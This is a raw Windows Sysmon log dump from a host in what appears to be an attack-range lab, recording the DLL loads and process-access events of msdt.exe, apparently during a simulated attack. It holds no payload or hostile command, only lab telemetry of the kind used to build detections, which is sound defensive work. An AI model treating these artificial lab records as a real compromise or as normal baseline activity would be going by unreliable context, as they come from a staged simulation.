734700x800000000000000099015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750A,IMPHASH=ADB9F71ACD4F7D3CF761AB6C59A7F1E5trueMicrosoft WindowsValid 734700x800000000000000099014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1,IMPHASH=EB898F83C3A5D6877A523BC64B41CB06trueMicrosoft WindowsValid 734700x800000000000000099013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\winhttp.dll10.0.14393.5006 (rs1_release.220301-1704)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=54658E22186450946F304FE8BB408BBB,SHA256=1877859D1B72E18784982F4254C8DAE24F15186D3CA74680E7915E53D50800A1,IMPHASH=35501E61EE90F9745FCEA0F1F844350FtrueMicrosoft WindowsValid 10341000x800000000000000099012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.812{326FD73D-A254-6294-1600-000000005502}13003216C:\Windows\system32\svchost.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-A254-6294-1600-000000005502}13001356C:\Windows\system32\svchost.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560D,IMPHASH=5500EF6AAEED0FAA2DE0F3B65E67DE20trueMicrosoft WindowsValid 10341000x800000000000000099009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.812{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002A,IMPHASH=C852E8FD14D356C81F834E318EEAD7FAtrueMicrosoft WindowsValid 734700x800000000000000099007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 
734700x800000000000000099006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\wer.dll10.0.14393.4704 (rs1_release.211004-1917)Windows Error Reporting DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationwer.dllMD5=7E027B814172825204990B59AA353DB6,SHA256=F6F12530FE0312540C3C1310D618EE4D9005199E90E1BB9B385CA086C54E20C1,IMPHASH=D4255358570CE65AE9390E07B2795ADCtrueMicrosoft WindowsValid 734700x800000000000000099005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\cabinet.dll5.00 (rs1_release.160715-1616)Microsoft® Cabinet File APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcabinet.dllMD5=08A4A2712DB2AE10E483FB74E46B0E73,SHA256=EEB32E3E4256CC9935227ACD5BA576B75F1F6FE3C818D2127513CB22F823FECB,IMPHASH=536E202FBC448C2C3B40D60D87620951trueMicrosoft WindowsValid 734700x800000000000000099004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\dui70.dll10.0.14393.4169 (rs1_release.210107-1130)Windows DirectUI EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUI70.DLLMD5=C3DC010AC7F5880CC7BE626566FC4130,SHA256=3ED6E9D0AF769B0BFBE94DFF4CC07A94A81271133FBB60C9EB02676C92FFB87E,IMPHASH=E76D3161885DD9D13E8514AFC7BF3853trueMicrosoft WindowsValid 734700x800000000000000099003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\crypt32.dll10.0.14393.4946 (rs1_release.220131-0721)Crypto API32Microsoft® Windows® Operating SystemMicrosoft 
CorporationCRYPT32.DLLMD5=341C44C830FB5D4FA58EF6276D9D2511,SHA256=988C82047689A625BA54959D2DB401A6891B9C00CF8A262842FBA2F032519283,IMPHASH=42B269CD88D7BD841B43BB1788792A62trueMicrosoft WindowsValid 734700x800000000000000099002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242,IMPHASH=B6562243FBF394F03046E917C719260FtrueMicrosoft WindowsValid 734700x800000000000000099001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000099000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\duser.dll10.0.14393.0 (rs1_release.160715-1616)Windows DirectUser EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUser.DLLMD5=42D5E1F8641E9DCEE0D8751F6F7A8961,SHA256=9168110EF404BF179888AF4A0F02B2817F020BFB16351778F2DDD6915C92F190,IMPHASH=9134DC493583245CFD7E3B68926C19D0trueMicrosoft WindowsValid 734700x800000000000000098999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\wintrust.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=55FCE44E89BDA2444619661FE50F43EE,SHA256=420CACA0D821E7E9F1D1E683E9899BC2F6D5A4AA06C8D4BB23335DD9490CC0F8,IMPHASH=8B8383FC3FA03C92F859A2AF899A52ADtrueMicrosoft WindowsValid 734700x800000000000000098998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=0DB1A588A248E852AD781AE14333A5C6,SHA256=6F9C36C2663B90439A1AEE74855C521FCBBDB8C7B88382C9464906F1691F65F6,IMPHASH=06716A63D3E6F97CB489B0D6810B3519trueMicrosoft WindowsValid 734700x800000000000000098997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12,IMPHASH=67E6A4C8E164C0229E3FF1626F1894C6trueMicrosoft WindowsValid 734700x800000000000000098996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5,IMPHASH=C3F4A4DA2950075F09DD008B60FF567CtrueMicrosoft WindowsValid 
734700x800000000000000098992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899,IMPHASH=9060609FCB6C4120D4517877408A4A46trueMicrosoft WindowsValid 734700x800000000000000098991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160,IMPHASH=3C09BDCE2388320645D7656AE2AC744CtrueMicrosoft WindowsValid 734700x800000000000000098990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000098989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92,IMPHASH=9F3DE8492A7F075320A36332ACC9CAAFtrueMicrosoft WindowsValid 734700x800000000000000098988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575,IMPHASH=CBD4A2FD581B65B4B1934DA291FA2B86trueMicrosoft WindowsValid 734700x800000000000000098987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msdt.exe10.0.14393.0 (rs1_release.160715-1616)Diagnostics Troubleshooting WizardMicrosoft® Windows® Operating SystemMicrosoft Corporationmsdt.exeMD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35trueMicrosoft WindowsValid 734700x800000000000000098983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.765{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\windows.storage.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=92988D33BA5299F42B23A1A69000FE4F,SHA256=C79560448589DB04ABB617D9FCA27D4C8E229F344BDCA937322BA8C3E7DBDD53,IMPHASH=A03B8A6BEC68C432E677F3D5E1DA4FAFtrueMicrosoft WindowsValid 734700x800000000000000098982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.765{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704,IMPHASH=1835EBC72F9ADB09C6FCFABC04AC9C89trueMicrosoft WindowsValid 734700x800000000000000098981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.765{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\shell32.dll10.0.14393.5125 (rs1_release.220429-1732)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F6FECBE8E5C78CD1621E3FF94040AC88,SHA256=128677FA3B8E693EB1C71D455A574CAFB3A0BB688FA1F813F17E476098C59C77,IMPHASH=0DFD49B61B099EE341A0B3D9B49EE90DtrueMicrosoft WindowsValid 734700x800000000000000098980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft 
Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000098972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 